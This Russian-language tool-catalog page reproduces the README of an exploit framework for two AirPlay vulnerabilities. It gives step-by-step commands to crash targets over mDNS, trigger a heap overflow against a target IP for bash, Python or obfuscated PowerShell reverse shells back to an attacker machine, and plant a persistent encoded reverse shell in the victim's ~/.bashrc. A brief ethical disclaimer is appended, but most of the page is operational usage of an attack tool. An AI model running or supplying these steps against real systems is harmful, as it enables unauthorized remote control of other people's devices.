Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
AirBorne-PoC — poc для CVE-2025-24252 и CVE-2025-24132 | Kitploit
Инструменты/GitHubGitHub/ekomssavior/airborne-poc
Механизмы персистентностиАнализ уязвимостейЭксплуатацияШелл-кодПост-эксплуатацияКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc для CVE-2025-24252 и CVE-2025-24132

16427438 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
Поделиться

Фреймворк AirBorne PoC – Elite RCE Edition

Полный PoC-фреймворк для CVE-2025-24252 и CVE-2025-24132
Автор ekomsSavior |

AirBorne — это комбинированный фреймворк PoC, нацеленный на две серьезные уязвимости в сервисе Apple AirPlay. Он включает в себя полный триггер сбоя и рабочую обратную оболочку с опциональной персистентностью, слушателем и несколькими форматами полезных нагрузок — всё в одном скрипте.

Ищете оригинальную версию?
Устаревшая версия все еще доступна в ветке legacy этого репозитория.
Чтобы переключиться на нее:

root@kitploit:~
git checkout legacy

Рассматриваемые CVE

CVE-2025-24252 – Сбой записи mDNS TXT

  • Вызывает сбой демона AirPlayReceiver с помощью некорректного mDNS-пакета
  • Работает через UDP broadcast на порту 5353

CVE-2025-24132 – Переполнение кучи → Обратная оболочка (RCE)

  • Вызывает переполнение кучи в TCP-сервисе AirPlay на порту 7000
  • Поддерживает полезные нагрузки обратной оболочки bash, python и PowerShell
Скачать инструмент
  • Включает опциональную персистентность с помощью инъекции в .bashrc (Linux)

  • Начало работы

    1. Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. Установка зависимостей

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    Инструкция по запуску

    Единственный скрипт airborne.py включает оба PoC и всю логику:

    • Выберите CVE с помощью --exploit
    • Установите полезную нагрузку обратной оболочки с помощью --payload
    • Автоматически запускает слушатель netcat
    • Опционально включает персистентность на цели с помощью --persistent

    Примеры использования

    Сбой цели с помощью mDNS-пакета (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    Требуется интерфейс в режиме монитора.


    Запуск переполнения кучи → RCE (CVE-2025-24132)

    Запуск полного эксплойта с оболочкой bash по умолчанию:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    Выберите оболочку Python вместо этого:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Включите реальную персистентность на целях Linux:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    Только инъекция команд оболочки:

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    Варианты полезных нагрузок

    Полезная нагрузкаОписание
    bashОбратная оболочка bash по умолчанию через TCP
    pythonОбратная оболочка на Python с использованием socket и pty
    powershellПолная полезная нагрузка RCE для Windows PowerShell (обфусцирована)

    Режим персистентности

    При использовании --persistent скрипт добавит закодированную полезную нагрузку обратной оболочки в:

    root@kitploit:~
    ~/.bashrc
    

    Это гарантирует, что оболочка будет возвращена вам каждый раз, когда пользователь входит в систему или запускает терминал.


    Замечания по эксплуатации

    • Обратные оболочки кодируются с помощью base64 и доставляются после переполнения буфера
    • Все полезные нагрузки отправляются через порт 7000
    • mDNS-пакеты передаются через UDP 5353 и требуют разрешения на raw-сокеты
    • Убедитесь, что IP-адрес вашей атакующей машины доступен для целевого устройства
    • Скрипт обрабатывает основные ошибки и молча завершается, если порты закрыты

    Этическое предупреждение

    Этот проект предназначен только для образовательных, этических и авторизованных исследований.

    • Вы должны иметь явное разрешение на тестирование целевой системы.
    • Вы берете на себя полную ответственность за любые предпринятые действия.

    Несанкционированная эксплуатация систем незаконна и неэтична.


    Авторы

    • Разработано ekomsSavior
    • Вдохновлено реальными CVE и исследованиями разработки эксплойтов